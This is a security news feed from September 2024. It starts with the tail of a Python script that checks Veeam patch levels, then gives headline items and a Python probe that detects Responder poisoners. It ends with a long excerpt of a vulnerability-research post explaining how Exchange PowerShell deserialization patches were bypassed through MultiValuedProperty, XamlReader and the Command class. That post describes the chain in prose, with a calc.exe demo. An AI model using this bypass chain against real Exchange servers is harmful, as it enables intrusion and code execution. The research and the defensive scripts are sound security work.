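    'fixed'              -> at or above the fixed build
    'affected'           -> at or below the build the bulletin lists as affected
    'affected-unlisted'  -> between the two: newer than the quoted affected build but
                            still below the fix, so it must be treated as vulnerable
    'unknown-product'    -> not covered by this bulletin
    A short string such as '12.2' sorts below '12.2.0.334' and is therefore (correctly,
    if conservatively) reported as not fixed; record full build numbers.
    """
    if product not in FIXED_BUILDS:
        return "unknown-product"
    last_affected, fixed = (parse_build(v) for v in FIXED_BUILDS[product])
    build = parse_build(installed)
    if build >= fixed:
        return "fixed"
    if build <= last_affected:
        return "affected"
    return "affected-unlisted"


def report(inventory: dict[str, str]) -> dict[str, str]:
    """Assess every (product, installed build) pair in an inventory."""
    return {product: assess(product, build) for product, build in inventory.items()}


# Constructed sample inventory: what a CMDB export might look like, not real systems.
SAMPLE_INVENTORY = {
    "Veeam Backup & Replication": "12.1.2.172",      # exactly the quoted affected build
    "Veeam ONE": "12.2.0.4093",                       # already on the fixed build
    "Veeam Service Provider Console": "8.0.0.20145",  # hotfix above 19552, still below fix
    "Veeam Agent for Linux": "6.2.0.101",             # fixed
    "Veeam Explorer": "12.1.0.1",                     # not covered by this bulletin
}

if __name__ == "__main__":
    for product, status in report(SAMPLE_INVENTORY).items():
        print(f"{product:40} {SAMPLE_INVENTORY[product]:14} {status}")
```

Feed it the build numbers from your own asset inventory; anything reported as affected or affected-unlisted needs the upgrade, and the VSPC case in the sample shows why a plain "is it older than 8.0.0.19552?" check is not enough.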
2024-09-06 06:25:46
Russian Cyber Unit 29155 Exposed: Targeting NATO and Allied NationsThe United States, along with its allies, has formally identified a group of Russian hackers, tracked under names such as Cadet Blizzard and Ember Bear, as responsible for large-scale attacks on critical infrastructure in the U.S. and worldwide. These hackers are linked to Unit 29155 of Russia's Main Directorate of the General Staff of the Armed Forces (GRU), a military intelligence unit that has long been under scrutiny for its covert operations. In a joint advisory released by the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the National Security Agency (NSA), it was revealed that the GRU hackers, often junior officers from the GRU's 161st Specialist Training Center, have been involved in cyber sabotage since 2020 under the leadership and oversight of experienced members of Unit 29155. The unit has not only targeted critical infrastructure but has also been linked to physical sabotage and assassination attempts throughout Europe.
WhisperGate Malware and Cyberattacks
The group gained significant notoriety in January 2022 when it deployed WhisperGate, a data-wiping malware, against Ukrainian organizations. The attacks were part of a broader campaign aimed at destabilizing Ukraine and interfering with the efforts of NATO and allied nations to support the country. The malware signalled the hackers' capabilities, marking a shift from cyber-espionage to outright data destruction. WhisperGate attacks began on January 13, 2022, focusing on disrupting Ukraine's defense and critical services. The joint advisory emphasizes that Unit 29155 is distinct from other well-known GRU-affiliated units, such as Units 26165 and 74455, which were responsible for previous cyberattacks in Europe and the U.S. Since early 2022, the group has pivoted its focus toward disrupting aid efforts for Ukraine, expanding its cyber toolkit to include methods that blend espionage with destruction. The joint advisory stresses that the hackers are honing their technical skills and building experience by conducting more advanced cyber operations across various global regions.
Unit 29155: A Wide Range of Attacks Across Continents
According to U.S. intelligence, Unit 29155 has been responsible for a wide range of cyberattacks affecting NATO countries, along with others in North America, Europe, Latin America, and Central Asia. Their tactics have included website defacement, public leaks of stolen data, and extensive infrastructure scanning to uncover vulnerabilities. These attacks have not been limited to Ukraine but have spread across multiple sectors, including energy, government services, and financial institutions. As a result, critical infrastructure across NATO member states faces an increasing risk of compromise. The FBI has been tracking the activities of Unit 29155 closely, having detected over 14,000 domain scanning attempts targeting at least 26 NATO members and several European Union (EU) nations. These scans were aimed at identifying weaknesses in critical systems that could be exploited in future attacks.
U.S. Offers Reward for Key GRU Officers
In response to these attacks, the U.S. State Department announced a reward of up to $10 million for information leading to the identification or capture of five Russian military intelligence officers. These individuals are believed to be part of the GRU's Unit 29155 and include Vladislav Borovkov, Denis Igorevich Denisenko, Yuriy Denisov, Dmitry Yuryevich Goloshubov, and Nikolay Aleksandrovich Korchagin. These officers are accused of carrying out cyber operations that have harmed critical U.S. infrastructure, with particular emphasis on the energy, government, and aerospace sectors. Their cyber activities are linked to the sabotage of Western countries' efforts to support Ukraine and the disruption of sectors critical to national security. In addition to the military officers, a civilian named Amin Timovich has also been indicted for his involvement in the WhisperGate attacks against Ukraine. This indictment, along with the charges against the five GRU officers, highlights the seriousness of Russia's cyber operations and the coordinated effort to bring those responsible to justice.
Protecting Critical Infrastructure: Recommendations
As Unit 29155 continues its cyber operations across the globe, organizations within critical infrastructure sectors are urged to enhance their defenses. Immediate actions recommended by cybersecurity authorities include:
- Patching vulnerabilities in systems to close potential entry points for cyberattacks.
- Implementing phishing-resistant multifactor authentication (MFA) to strengthen account security, particularly for services like webmail and virtual private networks (VPNs).
- Segmenting networks to contain any malicious activity should an intrusion occur.
These defensive strategies are especially important for organizations within sectors frequently targeted by Russian hackers, including energy, transportation, healthcare, and government services.
Global Concerns and Long-Term Implications
Since Russia's invasion of Ukraine in February 2022, cyberattacks have escalated in both scale and severity. Alongside the WhisperGate malware, other destructive tools such as HermeticWiper and ransomware decoys have been used to cripple Ukrainian systems. CISA and the FBI warned early on that such malware could easily spread beyond Ukraine, affecting global systems if defenses were not adequately prepared. Wednesday's announcement of the U.S. seizing 32 web domains linked to Russian disinformation campaigns highlights the broader cyber and information warfare being waged by Russia. These domains were part of a network aimed at spreading false information to influence the upcoming 2024 U.S. presidential election.
Tracking Cyber Threats: Industry and Government Coordination
The cybersecurity industry plays a critical role in identifying and mitigating threats posed by groups like Unit 29155. Leading cybersecurity firms and government agencies continuously track the activities of Russian cyber actors under various names, such as Cadet Blizzard (Microsoft) and Ember Bear (CrowdStrike). These groups have demonstrated advanced capabilities in reconnaissance, scanning, and exploiting vulnerabilities in critical systems. As Unit 29155 continues its cyber operations, the global community remains on high alert. Efforts to strengthen critical infrastructure and improve cyber defenses have never been more critical. While the hunt for the GRU officers involved in these attacks intensifies, the larger challenge remains how to effectively mitigate and defend against the growing cyber threats facing the world today.
by The Cyber Express
2024-09-06 05:02:07
September 2024 Patch Tuesday forecast: Downgrade is the new exploitI asked for a calm August 2024 Patch Tuesday in last month’s forecast article and that came to pass. The updates released were limited to the regular operating systems and all forms of Office applications. Six zero-day vulnerabilities were announced, with five in the operating systems and one in the Office applications. There were 63 CVEs addressed in the Windows 10 operating systems and associated servers and 55 CVEs addressed in Windows 11. Overall, it … More → The post September 2024 Patch Tuesday forecast: Downgrade is the new exploit appeared first on Help Net Security.
by Help Net Security
2024-09-06 05:00:15
Human firewalls are essential to keeping SaaS environments safeBusinesses run on SaaS solutions: nearly every business function relies on multiple cloud-based tech platforms and collaborative work tools like Slack, Google Workspace apps, Jira, Zendesk and others. We recently surveyed security leaders and CISOs on top data security priorities and challenges. We discovered that over 70% work in organizations using 50 or more SaaS solutions, and nearly a third of the respondents reported their organization’s SaaS environments include 200 or more apps. With so … More → The post Human firewalls are essential to keeping SaaS environments safe appeared first on Help Net Security.
by Help Net Security
2024-09-06 04:30:34
Respotter: Open-source Responder honeypotRespotter is an open-source honeypot designed to detect attackers when they launch Responder within your environment. It identifies active instances of Responder by exploiting Responder's own behavior: it answers any name-resolution query it sees. Respotter uses the LLMNR, mDNS, and NBNS protocols to query a non-existent hostname (default: Loremipsumdolorsitamet); no legitimate host should ever claim that name, so if any of these requests receives a response, Responder (or a similar poisoner) is likely operating on your network. Respotter can send webhooks to Slack, Teams, or Discord. It also supports sending … More → The post Respotter: Open-source Responder honeypot appeared first on Help Net Security.
by Help Net Security
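The check described above, as an added example that is not Respotter's own code: a minimal Python probe that builds a query for the canary name over LLMNR, mDNS and NBNS, collects every answer until a timeout, and treats any answer as evidence of a poisoner. The canary name and the multicast/broadcast endpoints are the standard ones Respotter documents; the packet builders, the answer parser and the probe loop are this example's own, and the response bytes in the comments are constructed, not captured.

```python
"""Probe for Responder the way Respotter does: ask for a name that does not exist
over LLMNR, mDNS and NBNS, and treat any answer as a poisoner.

Added example, not Respotter's own code.  The canary name and the
multicast/broadcast endpoints are the standard ones; everything else here is
this example's own.
"""
import secrets
import socket
import struct

CANARY = "Loremipsumdolorsitamet"        # Respotter's default bogus hostname
LLMNR = ("224.0.0.252", 5355)            # RFC 4795 multicast group and port
MDNS = ("224.0.0.251", 5353)             # RFC 6762 multicast group and port
NBNS = ("255.255.255.255", 137)          # NetBIOS name service, broadcast


def encode_dns_name(name: str) -> bytes:
    """'a.local' -> b'\\x01a\\x05local\\x00' (DNS label format, shared by LLMNR and mDNS)."""
    return b"".join(bytes([len(label)]) + label.encode() for label in name.split(".")) + b"\x00"


def build_dns_query(txid: int, name: str) -> bytes:
    """Standard A-record query; LLMNR and mDNS both use the DNS wire format."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)  # flags=0: plain query, 1 question
    return header + encode_dns_name(name) + struct.pack(">HH", 1, 1)  # QTYPE=A, QCLASS=IN


def nbns_encode(name: str) -> bytes:
    """NetBIOS first-level encoding: name padded to 15 chars + 0x00 suffix, each nibble + 'A'."""
    raw = (name.upper()[:15].ljust(15) + "\x00").encode()
    encoded = "".join(chr(0x41 + (b >> 4)) + chr(0x41 + (b & 0x0F)) for b in raw)
    return b"\x20" + encoded.encode() + b"\x00"   # one 32-byte label, then root


def build_nbns_query(txid: int, name: str) -> bytes:
    """NBNS name query: flags 0x0110 = query, broadcast, recursion desired; QTYPE=NB (0x20)."""
    header = struct.pack(">HHHHHH", txid, 0x0110, 1, 0, 0, 0)
    return header + nbns_encode(name) + struct.pack(">HH", 0x20, 1)


def _skip_name(buf: bytes, off: int) -> int:
    """Advance past a (possibly compressed) name and return the new offset."""
    while True:
        length = buf[off]
        if length == 0:
            return off + 1
        if length & 0xC0 == 0xC0:   # compression pointer: two bytes, and it ends the name
            return off + 2
        off += 1 + length


def parse_answers(resp: bytes, txid: int) -> list:
    """Return IPv4 addresses from A or NB answers that match our transaction id, else []."""
    if len(resp) < 12:
        return []
    rid, flags, qdcount, ancount, _, _ = struct.unpack(">HHHHHH", resp[:12])
    if rid != txid or not flags & 0x8000 or ancount == 0:   # not ours, not a response, or empty
        return []
    off = 12
    for _ in range(qdcount):                     # skip the echoed question section
        off = _skip_name(resp, off) + 4
    addrs = []
    for _ in range(ancount):
        off = _skip_name(resp, off)
        rtype, _, _, rdlen = struct.unpack(">HHIH", resp[off:off + 10])
        off += 10
        rdata = resp[off:off + rdlen]
        off += rdlen
        if rtype == 1 and rdlen == 4:            # A record: one IPv4 address
            addrs.append(socket.inet_ntoa(rdata))
        elif rtype == 0x20:                       # NB record: repeated (2-byte flags, 4-byte addr)
            for i in range(2, rdlen - 3, 6):
                addrs.append(socket.inet_ntoa(rdata[i:i + 4]))
    return addrs


def probe(timeout: float = 2.0) -> dict:
    """Send the canary query on all three protocols; return {proto: [answering hosts]}."""
    plan = (
        ("LLMNR", LLMNR, build_dns_query, CANARY),
        ("mDNS", MDNS, build_dns_query, CANARY + ".local"),
        ("NBNS", NBNS, build_nbns_query, CANARY),
    )
    results = {}
    for proto, dst, builder, name in plan:
        txid = secrets.randbelow(0x10000)        # random id, so a stray reply cannot match
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
        sock.settimeout(timeout)
        hits = []
        try:
            sock.sendto(builder(txid, name), dst)
            while True:                           # keep collecting answers until the timeout
                data, (src, _) = sock.recvfrom(4096)
                if parse_answers(data, txid):
                    hits.append(src)
        except socket.timeout:
            pass
        finally:
            sock.close()
        results[proto] = hits
    return results


if __name__ == "__main__":
    for proto, hits in probe().items():
        verdict = "answer from " + ", ".join(hits) + " (poisoner suspected)" if hits else "no answer (expected)"
        print(f"{proto}: {verdict}")
```

Run it from a host on the segment you want to watch; on a clean network all three probes time out silently, and the source address of any answer is the host running the poisoner. Matching the transaction id and requiring the response bit is what keeps unrelated multicast chatter from producing false positives.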
2024-09-06 04:00:44
The true cost of cybercrime for your businessAs cybercriminals continue to refine their methods, blending traditional strategies with new technologies, the financial toll on individuals and organizations has reached alarming levels. Businesses are also grappling with mounting cybercrime costs from ransomware and DDoS attacks, which can inflict hundreds of thousands of dollars in damage within minutes. These statistics highlight a growing concern: as cybercrime costs rise and threats become more complex and widespread, they impact organizations of all sizes. Old methods, new … More → The post The true cost of cybercrime for your business appeared first on Help Net Security.
by Help Net Security
2024-09-06 03:30:38
83% of organizations experienced at least one ransomware attack in the last yearRansomware is an all-too-common occurrence: 83% of organizations have experienced at least one ransomware attack in the last year, 46% of respondents experienced four or more and 14% indicated they experienced 10 or more. Of those respondents who experienced at least one ransomware attack in the last year, 61% said it resulted in downtime of at least 24 hours, according to Onapsis. Source: Onapsis Of those organizations that experienced ransomware attacks, 89% said their Enterprise … More → The post 83% of organizations experienced at least one ransomware attack in the last year appeared first on Help Net Security.
by Help Net Security
2024-09-06 03:00:57
New infosec products of the week: September 6, 2024Here’s a look at the most interesting products from the past week, featuring releases from Binarly, Bitdefender, Prompt Security, Revenera, Skyhigh Security, and Vanta. Bitdefender Security for Creators protects YouTube content creators and influencers from hackers Bitdefender Security for Creators safeguards content channels and social media accounts from takeovers and supports Windows, Mac, Android, and iOS. Set-up takes a few moments and connects to both content channel and owner. Once activated, Bitdefender continuously monitors for … More → The post New infosec products of the week: September 6, 2024 appeared first on Help Net Security.
by Help Net Security
2024-09-06 00:00:00
Elastic releases the Detection Engineering Behavior Maturity ModelUsing this maturity model, security teams can make structured, measurable, and iterative improvements to their detection engineering teams.
by Elastic Security Lab
2024-09-05 23:21:52
RansomHub Claims Planned Parenthood Hack, Steals 93GB of Sensitive DataRansomHub claims to have breached Intermountain Planned Parenthood, stealing 93GB of data. The healthcare provider is investigating the…
by Hackread
2024-09-05 23:11:27
What Is the Shared Fate Model?New threats, an overburdened workforce, and regulatory pressures mean cloud service providers need a more resilient model than the shared responsibility framework. That's where "shared fate" comes in.
by Dark Reading
2024-09-05 21:49:00
Chinese-Speaking Hacker Group Targets Human Rights Studies in Middle EastUnnamed government entities in the Middle East and Malaysia are the target of a persistent cyber campaign orchestrated by a threat actor known as Tropic Trooper since June 2023. "Sighting this group's [Tactics, Techniques, and Procedures] in critical governmental entities in the Middle East, particularly those related to human rights studies, marks a new strategic move for them," Kaspersky
by The Hacker News
2024-09-05 21:35:00
Veeam Releases Security Updates to Fix 18 Flaws, Including 5 Critical IssuesVeeam has shipped security updates to address a total of 18 security flaws impacting its software products, including five critical vulnerabilities that could result in remote code execution. The list of shortcomings is below - CVE-2024-40711 (CVSS score: 9.8) - A vulnerability in Veeam Backup & Replication that allows unauthenticated remote code execution. CVE-2024-42024 (CVSS score: 9.1
by The Hacker News
2024-09-05 21:15:28
Kiteworks Bolsters Its Secure Data Collection Capabilities With 123FormBuilder Acquisition
by Dark Reading
2024-09-05 21:09:38
Palo Alto Networks® Closes Acquisition of IBM's QRadar SaaS Assets
by Dark Reading
2024-09-05 21:01:38
YubiKeys Are a Security Gold Standard—but They Can Be ClonedSecurity researchers have discovered a cryptographic flaw that leaves the YubiKey 5 vulnerable to attack.
by WIRED Security News
2024-09-05 20:56:45
Malvertising Campaign Builds a Phish for Lowe's EmployeesRetail employees are being duped into divulging their credentials by typosquatting malvertisements.
by Dark Reading
2024-09-05 20:39:26
Chinese 'Tropic Trooper' APT Targets Mideast GovernmentsIn the past, the group has targeted different sectors in East and Southeast Asia, but recently has pivoted its focus to the Middle East, specifically to entities that publish human rights studies.
by Dark Reading
2024-09-05 20:35:15
How AI can help fix this global healthcare challengeSingapore's health minister discusses aging populations and how AI can prepare nations for the inevitable.
by ZDNET Security
2024-09-05 20:15:02
China's 'Earth Lusca' Propagates Multiplatform BackdoorThe malware, KTLVdoor, has already been found on more than 50 command-and-control servers and enables full control of any environment it compromises.
by Dark Reading
2024-09-05 19:57:35
Veeam fixed a critical flaw in Veeam Backup & Replication softwareVeeam released security updates addressing multiple vulnerabilities in its products: 18 high- and critical-severity flaws in Veeam Backup & Replication, Service Provider Console, and ONE. The most severe flaw included in the September 2024 security bulletin is a critical, […]
by Security Affairs
2024-09-05 19:39:53
Biden Admin Files Charges Against Election Meddlers From RussiaWorking with the Treasury and Justice departments, the president has sanctioned anti-democratic Russian adversaries.
by Dark Reading
2024-09-05 19:34:18
KnowBe4 Children’s Interactive Cybersecurity Activity KitThe post KnowBe4 Children’s Interactive Cybersecurity Activity Kit appeared first on National Cybersecurity Alliance.
by National Cybersecurity Alliance
2024-09-05 18:56:51
US charges five Russian military hackers with targeting Ukraine's government with destructive malwareThe U.S. government indictment demonstrated deep knowledge of the Russian spies' activities, including their real-world meetings at a cafe in Moscow. © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2024-09-05 18:41:02
Russian GRU Unit Tied to Assassinations Linked to Global Cyber Sabotage and EspionageA secretive Russian military unit, previously linked to assassinations and destabilization in Europe, is blamed for destructive wiper malware attacks in Ukraine. The post Russian GRU Unit Tied to Assassinations Linked to Global Cyber Sabotage and Espionage appeared first on SecurityWeek.
by SecurityWeek
2024-09-05 18:18:49
Ransomware Gang Claims Cyberattack on Planned ParenthoodPlanned Parenthood confirms ""cybersecurity incident"" as RansomHub ransomware gang threatens to leak 93 Gb of data stolen from the nonprofit last week. The post Ransomware Gang Claims Cyberattack on Planned Parenthood appeared first on SecurityWeek.
by SecurityWeek
2024-09-05 18:00:02
The best and worst ways to get users to improve their account securityIn my opinion, mandatory enrollment is best enrollment.
by Cisco Talos Blog
2024-09-05 17:34:00
U.S. Seizes 32 Pro-Russian Propaganda Domains in Major Disinformation CrackdownThe U.S. Department of Justice (DoJ) on Wednesday announced the seizure of 32 internet domains used by a pro-Russian propaganda operation called Doppelganger as part of a sweeping set of actions. Accusing the Russian government-directed foreign malign influence campaign of violating U.S. money laundering and criminal trademark laws, the agency called out companies Social Design Agency (SDA),
by The Hacker News
2024-09-05 17:33:32
Apache fixes critical OFBiz remote code execution vulnerabilityApache has fixed a critical security vulnerability in its open-source OFBiz (Open For Business) software, which could allow attackers to execute arbitrary code on vulnerable Linux and Windows servers. [...]
by BleepingComputer
2024-09-05 17:28:25
Response to CISA Advisory (AA24-242A): #StopRansomware: RansomHub Ransomware. AttackIQ has released a new assessment template in response to the CISA Advisory (AA24-242A) published on August 29, 2024, which disseminates known RansomHub ransomware IOCs and TTPs identified through FBI threat response activities and third-party reporting as recently as August 2024. The post Response to CISA Advisory (AA24-242A): #StopRansomware: RansomHub Ransomware appeared first on AttackIQ.
by AttackIQ
2024-09-05 17:19:06
Preventing Infections of N-Day Exploits Delivered via Malicious Websites. State-backed attackers and commercial surveillance vendors repeatedly use N-day exploits to target known vulnerabilities in devices. The post Preventing Infections of N-Day Exploits Delivered via Malicious Websites appeared first on Zimperium.
by Zimperium
2024-09-05 17:05:08
Five Keys To Amplifying Business Value. Businesses can amplify their digital transformation to enhance value through five key elements: business agility, transparency and validation of outcomes, ease of inclusion, augmented analysis, and AI.
by ITPro Today
2024-09-05 17:00:35
Russia’s Most Notorious Special Forces Unit Now Has Its Own Cyber Warfare Team. Unit 29155 of Russia’s GRU military intelligence agency, a team responsible for coup attempts, assassinations, and bombings, has branched out into brazen hacking operations with targets across the world.
by WIRED Security News
2024-09-05 16:56:22
Microsoft removes revenge porn from Bing search using new tool. Microsoft announced today that it has partnered with StopNCII to proactively remove harmful intimate images and videos from Bing using digital hashes people create from their sensitive media. [...]
by BleepingComputer
2024-09-05 16:55:05
WordPress Mandates 2FA, SVN Passwords for Plugin, Theme Authors. Starting October 2024, WordPress requires plugin and theme authors to enable two-factor authentication (2FA) and use SVN-specific passwords…
by Hackread
2024-09-05 16:26:52
Watch our new documentary, "The Light We Keep: A Project PowerUp Story". The Light We Keep documentary tells the story of the consequences of electronic warfare in Ukraine and its effect on power grids across the country.
by Cisco Talos Blog
2024-09-05 16:09:41
Keeper Security Named a Value Leader in EMA’s 2024 PAM Radar™ Report. Passwords and secrets management organisation Keeper Security has earned the distinction of Value Leader in the latest Enterprise Management Associates (EMA) 2024 Privileged Access Management (PAM) Radar™ Report for the second year in a row. The report highlights KeeperPAM, the company’s unified, end-to-end encrypted, zero-trust PAM platform, for its exceptional performance in managing […] The post Keeper Security Named a Value Leader in EMA’s 2024 PAM Radar™ Report appeared first on IT Security Guru.
by IT Security Guru
2024-09-05 16:03:59
The GRC Group Strengthens Cybersecurity Offering with Acquisition of Pentest People, Expanding Its Global Reach and Expertise. The GRC Group (“GRC” or the “Group”), a leading provider of software and tech-enabled services to manage business risks and regulatory compliance, has today acquired Pentest People Ltd (“Pentest People”). The GRC Group is focused on building market-leading positions in select areas of the governance, risk and compliance market, and the acquisition of Pentest People […] The post The GRC Group Strengthens Cybersecurity Offering with Acquisition of Pentest People, Expanding Its Global Reach and Expertise appeared first on IT Security Guru.
by IT Security Guru
2024-09-05 15:52:47
How to prepare for ransomware attacks. You only have to take a look at the latest headlines to see that ransomware is still having a significant impact on organizations of all sizes across a wide variety of industries. The threat is evolving, though.
by Barracuda
2024-09-05 15:41:52
Why It's So Hard to Fully Block X in Brazil. With 20,000 internet providers across the country, the technical challenges of blocking X in Brazil mean some connections are slipping through the cracks.
by WIRED Security News
2024-09-05 15:39:37
Exploiting Exchange PowerShell After ProxyNotShell: Part 1 - MultiValuedProperty. As you may know, I recently presented my Exchange-related talk during OffensiveCon 2024. This series of four blog posts is meant to supplement the talk and provide additional technical details. For those who did not attend OffensiveCon, you can also watch the full talk here: “Half Measures and Full Compromise: Exploiting Microsoft Exchange PowerShell Remoting”. This blog post covers the part from 12:05 to 18:10. In this article, part one of the series, I describe the MultiValuedProperty exploitation primitive, which became fundamental for my further exploitation of Exchange PowerShell. I also present a bypass for Microsoft’s first patch for this vulnerability, accomplished by chaining MultiValuedProperty with the Command class.
Introduction
You might already be familiar with the Exchange ProxyNotShell chain, CVE-2022-41040 and CVE-2022-41082. It allowed any authenticated Exchange user to achieve remote code execution. ProxyNotShell was exploited in the wild before Microsoft released a patch. I described the ProxyNotShell chain, especially its RCE vector, in this blog post. Before proceeding with this post, please make sure that you are familiar with the original issue, as this article will focus on bypassing the patches. In this blog post, I would like to start with 2 RCE vulnerabilities:
• ZDI-23-163/ CVE-2023-21529 – abuse of the allowed MultiValuedProperty class.
• ZDI-23-881/ CVE-2023-32031 – bypass for CVE-2023-21529, abuse of the not-blocked Command class.
Accessing PowerShell Without ProxyShell Path Confusion
The original path confusion vulnerability, CVE-2021-34473, was discovered by Orange Tsai. He used it together with CVE-2021-34523 and CVE-2021-31207 to achieve pre-auth remote code execution, forming the chain known as ProxyShell. Microsoft’s original patch for the path confusion did not eliminate the root of the problem, but instead placed it behind authentication. After the patch, it was exploited in the wild for post-auth remote code execution using the ProxyNotShell chain mentioned above. Exploitation of the path confusion allowed a threat actor to reach the Exchange PowerShell backend by sending HTTP requests to the autodiscover endpoint. After the patch for ProxyNotShell, it appears that this attack vector is completely blocked, though I must admit that I have never fully verified that patch. Nonetheless, a low-privileged attacker still has direct access to Exchange PowerShell Remoting, subject to Kerberos authentication. This is because every Exchange user can trigger some Exchange PowerShell cmdlets, such as Get-Mailbox. Instructions that describe direct interaction with Exchange PowerShell can be found here. As Kerberos authentication is required, this attack surface is probably restricted to internal attackers, which is to say, attackers who are already present in the organization’s network. There remains plenty of reason for concern, though. It would not be good if any domain account (and organization member) could escalate to SYSTEM on the Exchange server.
Patch for the ProxyNotShell CVE-2022-41082 RCE
CVE-2022-41082, the RCE part of the ProxyNotShell chain, was fixed with the introduction of the Microsoft.Exchange.Diagnostics.UnitySerializationHolderSurrogateSelector class. It extends SurrogateSelector and its main goal is to validate the types that are retrieved during the deserialization of UnitySerializationHolder. It does this by checking the types against an allow list. Microsoft’s approach here seems appropriate. An allow list is probably the best way to fight deserialization issues and similar type-based vulnerabilities. However, when the allow list is extensive, it may be possible to find some types there that can be used in exploitation. I decided to take this path and look for potentially dangerous allowed classes.
ZDI-23-162/ CVE-2023-21529 – Allowed MultiValuedProperty Leads to RCE
The Exchange allow lists can be divided into two main parts:
• List of allowed regular types.
• List of allowed generic types.
Generic types seem especially interesting because they allow the inclusion of arbitrary, internal types. Moreover, generic types can also be retrieved through a deserialization of UnitySerializationHolder. Let’s review the list of allowed generics that are defined in the Microsoft.Exchange.Data.SerializationTypeConverter.allowedGenerics member. The first part of the list is especially interesting because it contains custom Exchange types. It turns out that deserialization involving retrieval of the Microsoft.Exchange.Data.MultiValuedProperty<T> or Microsoft.Exchange.Data.DagNetMultiValuedProperty<T> generic classes can lead to remote code execution. One may remember that PowerShell Remoting deserialization allows one to call a single-argument constructor of any allowed type (as long as the argument can also be deserialized). This leads us to consider the single-argument constructor of MultiValuedProperty<T>. As you can see, it accepts an argument of type object. Thus, the attacker can provide an instance of any allowed PowerShell Remoting deserializable class. This constructor invokes a different constructor that accepts a larger number of arguments. A great deal of processing occurs after the constructor call. Of primary interest is that we ultimately reach the ValueConvertor.ConvertValue method. Here, the attacker-controlled type is provided as the second argument, while the attacker-controlled object is provided as the first argument. This is the object provided to the MultiValuedProperty constructor. At [1], it invokes ValueConvertor.TryParseConversion. This call looks particularly interesting because the method name suggests that the Parse method is involved. At [2], it calls TryConstructorConversion. Let’s focus on the parse-based conversion now. At this stage, it is worth noting the values of specific arguments:
• originalValue - value provided by the attacker to the MultiValuedProperty constructor.
• originalType - type of the originalValue.
• resultType - the type parameter (“T”) of the attacker-specified generic MultiValuedProperty<T> type.
At [1], the method checks if originalType is the type string. At [2], it calls ConvertValueFromString. This method is also called during the deserialization process. This method hardcodes several possible conversions and throws NotImplementedException if the conversion from originalType to resultType is not implemented. At [3], it catches the exception. At [4], it retrieves the public static Parse method from the attacker-controlled resultType. At [5], it invokes the Parse method with the attacker-specified value. To summarize, the MultiValuedProperty<T> generic class implements another way to call the Parse method. This can result in invocation of the XamlReader.Parse(String) method with an attacker-controlled string. In addition, TryConstructorConversion allows one to call a single-argument constructor of a given class. At this point, one can see that the MultiValuedProperty<T> class implements the two most powerful conversions of PowerShell Remoting. Since it is an internal deserialization mechanism, it is included on the allow list. It can be abused by the attacker, for example to call a single-argument constructor of any accessible class. This became a fundamental building block for my subsequent vulnerability research. As an example of how MultiValuedProperty<T> can be abused, consider the following code: This line simulates what we achieve via Exchange PowerShell Remoting during exploitation:
• The attacker provides a serialized UnitySerializationHolder object that specifies the allowed MultiValuedProperty<T> type. The type parameter, T, is set to System.Windows.Markup.XamlReader.
• An allow list check is performed on our type: MultiValuedProperty<XamlReader>. The check is successful, because: (1) MultiValuedProperty<T> is present on the allow list, and (2) the type specified in the type parameter, XamlReader, is not subjected to validation at all.
• The MultiValuedProperty constructor instantiates a XamlReader object by calling the static XamlReader.Parse(String) method.
• As the attacker controls the input string, they can provide any XAML deserialization gadget to achieve remote code execution.
The simplified attack scheme is presented in the following diagram. As we have shown, allow lists are not always secure, and they need to be carefully reviewed. It may turn out that even in a product as mature as Microsoft Exchange, allowed classes may contain functionality that can be abused. This may be especially true for generic classes included in the allow list. The generic (internal) type should always be verified by your type control mechanism. Otherwise, your allowed class may turn out to be abusable. Moreover, class inheritance should also be verified. For example, suppose that Microsoft removed MultiValuedProperty<T> from the allow list. We would still be able to reach it via the allowed type DagNetMultiValuedProperty<T>: DagNetMultiValuedProperty<T> inherits from MultiValuedProperty<T>. Its single-argument constructor calls the constructor of the base class. Thus, it is another way to trigger the dangerous routine, and it could be abused even if MultiValuedProperty<T> were removed from the allow list.
ZDI-23-881/ CVE-2023-32031 – Bypassing the Internal Deny List with the Command Class
In CVE-2023-21529, I abused the internal deserialization-like mechanism that can be reached through the allow-listed MultiValuedProperty<T> class. When considering potential patches, two approaches present themselves:
• Remove MultiValuedProperty<T> from the allow list.
• Implement additional type control in the internal deserialization mechanism within MultiValuedProperty.
MultiValuedProperty is used frequently by Exchange, thus removing it from the allow list is not an option. Implementing type control in the internal deserialization mechanism defined in ValueConvertor.ConvertValue looks like a good option, though. This is what the patch looks like: You can see that the ChainedSerializationBinder.ValidateResultType method was introduced, to limit the types that the attacker can specify. Consequently, if the attacker provides the type MultiValuedProperty<XamlReader>, an exception is thrown, because the type XamlReader fails the new validation. Looking deeper into the validation mechanism, though, I found that type validation here is based on a deny list. Instead of implementing an allow list of types that can be used with MultiValuedProperty, a deny list was used. If you have seen my Hexacon talk about .NET deserialization, you probably know that I love messing with deny lists. The Exchange deny list is actually pretty good, and it contains dozens of classes. However, it contains almost no internal Exchange classes. My idea was to look for a class that:
• Is not on the deny list.
• Implements a public and static Parse(String) method that leads to something exploitable, or
• Implements a public constructor that accepts a single argument and leads to something exploitable.
Such a class could be abused when chained with MultiValuedProperty internal deserialization. The constructor-based deserialization is handled by the previously mentioned TryConstructorConversion method, and it is pretty much the same as the one implemented in PowerShell Remoting. It didn’t take me long to find the Microsoft.Diagnostics.Runtime.Utilities.Command class: At [1], the Command(String) constructor calls the Command(String, CommandOptions) constructor. At [2], a new ProcessStartInfo is instantiated, and both the process name and arguments are retrieved from the attacker-controlled input. At [3], Process.StartInfo is set to the ProcessStartInfo object from line [2]. At [4], a new process is started. This class was not included in the deny list, so the following code: Leads to the execution of cmd.exe /c calc.exe. That’s it. To sum this up, I did the following:
• I used the allow-listed MultiValuedProperty class to reach the internal deserialization mechanism. This mechanism is protected with the deny list of abusable types.
• I delivered the Command class, which is not on the deny list. This allows execution of an arbitrary command.
Demo
I presented the demo for CVE-2023-32031 during my Hexacon 2023 talk about .NET deserialization. It shows the entire exploitation process with the debugger attached.
Summary
